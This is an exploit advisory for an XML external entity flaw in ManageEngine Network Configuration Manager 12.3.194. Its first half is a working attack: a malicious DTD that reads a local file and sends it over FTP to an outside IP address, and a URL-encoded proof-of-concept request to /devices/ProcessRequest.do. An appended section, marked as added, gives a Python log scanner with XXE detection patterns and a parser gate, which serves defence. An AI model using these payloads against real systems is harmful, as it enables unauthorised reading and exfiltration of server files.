Zoho ManageEngine Network Configuration Manager 12.3.194 XXE vulnerability

Date: 2018/09/19
Software Link: https://www.manageengine.com/network-configuration-manager/download.html
Category: Web Application
Exploit Author: jacky xing from DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn

An XML External Entity injection (XXE) vulnerability exists in Zoho ManageEngine Network Configuration Manager 12.3.194 via the RequestXML parameter in a /devices/ProcessRequest.do GET request.

My VPS's evil.xml:

```xml
<!ENTITY % file SYSTEM "file:///c:\test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'ftp://69.194.9.178:2121/%file;'>">
%int;
%send;
```

I used the FTP protocol to read the file; it can read the file c:\test.txt. The test.txt is just for testing.

Then I used the PoC to request my VPS's evil.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://69.194.9.178/xxe/evil.xml">%remote;]><root></root>
```

The vulnerability exists in /devices/ProcessRequest.do?RequestID=463&RequestXML=, so I tested it with the URL-encoded PoC:

```
http://127.0.0.1:8060/devices/ProcessRequest.do?RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E
```

On my VPS, I used a Python script to serve the FTP protocol for accepting the data. When I sent the request, I received the content of test.txt on my VPS.
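The following is an added example, not part of this advisory and not ManageEngine's code. It shows the two things a defender wants from this report: how to spot the request above in web-server access logs (percent-decode the RequestXML parameter and look for DTD, entity and SYSTEM constructs, which a legitimate RequestXML document never needs), and the server-side gate that would have rejected the document before it reached the XML parser. The access-log line format, the `safe_parse` helper and the benign request are constructed for this example; the malicious query string is the advisory's own URL-encoded PoC.

```python
"""Detect XXE payloads in the RequestXML parameter and reject them before parsing.

Added example (not part of the original advisory). The log line format and the
benign request are constructed; the malicious query string is the one from the
advisory above.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Each indicator: a name for reporting and the pattern that detects it in the
# *decoded* XML document. None of these belongs in a RequestXML document.
XXE_INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE", re.IGNORECASE)),
    ("entity-declaration", re.compile(r"<!ENTITY", re.IGNORECASE)),
    ("external-identifier", re.compile(r"""\b(?:SYSTEM|PUBLIC)\s+['"]""", re.IGNORECASE)),
    ("parameter-entity-reference", re.compile(r"%[A-Za-z_][\w.\-]*;")),
]

# Request target inside a common-log-format request line, e.g. "GET /x?y=1 HTTP/1.1".
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def xxe_indicators(xml_text):
    """Return the names of all XXE indicators present in a decoded XML document."""
    return [name for name, pattern in XXE_INDICATORS if pattern.search(xml_text)]


def is_xxe_suspicious(xml_text):
    return bool(xxe_indicators(xml_text))


def extract_request_xml(request_target):
    """Return the decoded RequestXML value from a request target such as
    /devices/ProcessRequest.do?RequestID=463&RequestXML=..., or None if absent."""
    query = urlsplit(request_target).query
    # parse_qs percent-decodes the value, so %3C%21DOCTYPE becomes <!DOCTYPE.
    values = parse_qs(query, keep_blank_values=True).get("RequestXML")
    return values[0] if values else None


def scan_log_line(line):
    """Return (request_xml, indicators) for a ProcessRequest.do access-log line,
    or None when the line carries no RequestXML parameter."""
    m = REQUEST_LINE.search(line)
    if not m or "/devices/ProcessRequest.do" not in m.group(1):
        return None
    request_xml = extract_request_xml(m.group(1))
    if request_xml is None:
        return None
    return request_xml, xxe_indicators(request_xml)


def scan_log(lines):
    """Return (request_xml, indicators) for every line whose RequestXML is suspicious."""
    hits = []
    for line in lines:
        result = scan_log_line(line)
        if result and result[1]:
            hits.append(result)
    return hits


def safe_parse(xml_text):
    """Server-side gate (hypothetical helper): refuse any document carrying DTD or
    entity constructs, then parse the remainder with ElementTree."""
    found = xxe_indicators(xml_text)
    if found:
        raise ValueError("rejected RequestXML with XXE indicators: " + ", ".join(found))
    return ET.fromstring(xml_text)


# Constructed sample access-log lines. The first query string is the URL-encoded
# proof of concept from the advisory; the second is a benign request made up here.
MALICIOUS_QUERY = (
    "RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E"
    "%3C%21DOCTYPE%20root%20%5B%3C%21ENTITY%20%25%20remote%20SYSTEM%20%22http%3A%2f%2f"
    "69.194.9.178%2fxxe%2fevil.xml%22%3E%25remote%3B%5D%3E%3Croot%3E%3C%2froot%3E"
)
BENIGN_QUERY = (
    "RequestID=463&RequestXML=%3C%3Fxml%20version%3D%221.0%22%3F%3E"
    "%3Crequest%3E%3CdeviceId%3E7%3C%2FdeviceId%3E%3C%2Frequest%3E"
)
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Sep/2018:10:00:00 +0000] "GET /devices/ProcessRequest.do?'
    + MALICIOUS_QUERY + ' HTTP/1.1" 200 512',
    '10.0.0.6 - - [19/Sep/2018:10:00:01 +0000] "GET /devices/ProcessRequest.do?'
    + BENIGN_QUERY + ' HTTP/1.1" 200 512',
    '10.0.0.7 - - [19/Sep/2018:10:00:02 +0000] "GET /devices/list.do HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for request_xml, indicators in scan_log(SAMPLE_LOG):
        print("XXE indicators", indicators, "in", request_xml[:60] + "...")
```

Running the block reports the first sample line with all four indicators (DOCTYPE, entity declaration, SYSTEM identifier, parameter-entity reference) and stays silent on the other two. The gate in `safe_parse` is the same idea the Java fix takes: with a JAXP/Xerces parser, enabling the `http://apache.org/xml/features/disallow-doctype-decl` feature makes any DOCTYPE a parse error, so neither the inline entity nor the remote DTD fetch can happen. On the network side, the signal in this report is the NCM host itself opening outbound HTTP and FTP connections to an address it has no business contacting; egress filtering from the application server blocks the out-of-band channel even when the parser is not yet patched.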